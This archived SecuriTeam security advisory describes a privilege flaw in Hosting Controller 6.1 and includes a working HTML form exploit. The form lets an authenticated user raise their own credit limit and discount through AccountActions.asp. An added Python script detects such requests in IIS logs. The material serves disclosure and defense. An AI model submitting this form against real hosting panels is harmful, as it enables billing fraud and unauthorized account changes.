[EXPL] Hosting Controller Change Credit Limit Exploit (AccountActions.asp) (msg#00096, security.securiteam)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -

Hosting Controller Change Credit Limit Exploit (AccountActions.asp)
------------------------------------------------------------------------

SUMMARY

"<http://hostingcontroller.com/> Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform."

A vulnerability in Hosting Controller allows an authenticated user to change his/her own credit limit.

DETAILS

Vulnerable Systems:
 * Hosting Controller version 6.1 HotFix 2.1 and prior.

Exploit code:

```html
GET CREDIT<br>Soroush Dalili from GSG<br>
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr><td>Username:</td>
    <td><input type="text" name="UserName" value=""></td></tr>
<tr><td>Description:</td>
    <td><input type="text" name="Description" value=""></td></tr>
<tr><td>FullName:</td>
    <td><input type="text" name="FullName" value=""></td></tr>
<tr><td>AccountDisabled 1,[blank]:</td>
    <td><input type="text" name="AccountDisabled" value=""></td></tr>
<tr><td>UserChangePassword:</td>
    <td><input type="text" name="UserChangePassword" value=""></td></tr>
<tr><td>PassCheck=TRUE,0:</td>
    <td><input type="text" name="PassCheck" value="0"></td></tr>
<tr><td>New Password:</td>
    <td><input type="text" name="Pass1" value=""></td></tr>
<tr><td>DefaultDiscount%:</td>
    <td><input type="text" name="DefaultDiscount" value="100"></td></tr>
<tr><td>CreditLimit:</td>
    <td><input type="text" name="CreditLimit" value="99999"></td></tr>
</table>
<br><input type="submit">
</form>
<hr><br>
```

ADDITIONAL INFORMATION

The information has been provided by <mailto:Irsdl@xxxxxxxxx> Soroush Dalili.
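Because the action name travels in the query string of AccountActions.asp, it is recorded in the cs-uri-query field of a standard IIS W3C log even though the POST body is not. The following script is an added detection example, not part of the advisory: it parses W3C log lines and flags credit-limit updates submitted by accounts outside an assumed administrator list. The log lines, field list, usernames and addresses are constructed.

```python
"""Flag UpdateCreditLimit submissions in IIS W3C logs by non-admin accounts."""
from urllib.parse import parse_qs

# Constructed sample log (field selection, users and IPs are assumptions).
SAMPLE_LOG = """\
#Version: 1.0
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2008-04-01 10:00:01 GET /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit hcadmin 10.0.0.5 200
2008-04-01 10:00:07 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit reseller7 10.0.0.9 302
2008-04-01 10:00:09 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit - 10.0.0.9 302
2008-04-01 10:00:12 POST /Hosting/Sites/AddSite.asp - reseller7 10.0.0.9 200
"""

ADMIN_USERS = {"hcadmin"}  # assumption: the only accounts allowed to set credit limits
TARGET_STEM = "/admin/accounts/accountactions.asp"
TARGET_ACTION = "updatecreditlimit"


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def is_credit_limit_update(entry):
    """True when the request targets AccountActions.asp with ActionType=UpdateCreditLimit."""
    if entry.get("cs-uri-stem", "").lower() != TARGET_STEM:
        return False
    raw = entry.get("cs-uri-query", "-")
    query = parse_qs("" if raw == "-" else raw)
    actions = [v.lower() for k, vs in query.items() if k.lower() == "actiontype" for v in vs]
    return TARGET_ACTION in actions


def find_suspicious(text):
    """Return (timestamp, user, client ip) for POSTed credit-limit updates not made by an admin.

    A cs-username of "-" means IIS did not authenticate the request itself (typical
    with cookie/forms logins), so those submissions are reported for follow-up too.
    """
    hits = []
    for entry in parse_w3c(text):
        if entry.get("cs-method") != "POST" or not is_credit_limit_update(entry):
            continue
        if entry.get("cs-username", "-") not in ADMIN_USERS:
            hits.append((f"{entry['date']} {entry['time']}", entry["cs-username"], entry["c-ip"]))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("non-admin credit limit update:", hit)
```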
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
========================================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.